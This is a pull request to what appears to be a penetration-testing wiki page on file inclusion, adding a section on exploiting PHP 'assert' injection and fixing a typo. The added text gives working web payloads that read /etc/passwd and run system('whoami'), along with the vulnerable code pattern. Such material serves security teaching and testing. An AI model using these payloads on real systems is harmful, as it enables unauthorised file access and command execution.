### PR TITLE
New method for LFI, RCE in 'assert' statements

### DIFF
--- a/pentesting-web/file-inclusion/README.md
+++ b/pentesting-web/file-inclusion/README.md
@@ -262,6 +262,24 @@ For more information read the following post:
 
 {% page-ref page="phar-deserialization.md" %}
 
+## LFI via PHP's 'assert'
+
+If you encounter a difficult LFI that appears to be filtering traversal strings such as ".." and responding with something along the lines of "Hacking attempt" or "Nice try!", an 'assert' injection payload may work.
+
+A payload like this:
+```
+' and die(show_source('/etc/passwd')) or '
+```
+will successfully exploit PHP code for a "file" parameter that looks like this:
+```
+assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
+```
+It's also possible to get RCE in a vulnerable "assert" statement using the system() function:
+```
+' and die(system("whoami")) or '
+```
+Be sure to URL-encode payloads before you send them.
+
 ## LFI2RCE
 
 ### Basic RFI
@@ -357,7 +375,7 @@ To exploit this vulnerability you need: **A LFI vulnerability, a page where phpi
 
 [https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py)
 
-**Turotial HTB**: [https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s](https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s)
+**Tutorial HTB**: [https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s](https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s)
 
 You need to fix the exploit \(change  **=&gt;** for **=&gt;**\). To do so you can do:
 


### PR DESCRIPTION
Added payloads for LFI and RCE in vulnerable PHP 'assert' statements, fixed a preexisting typo.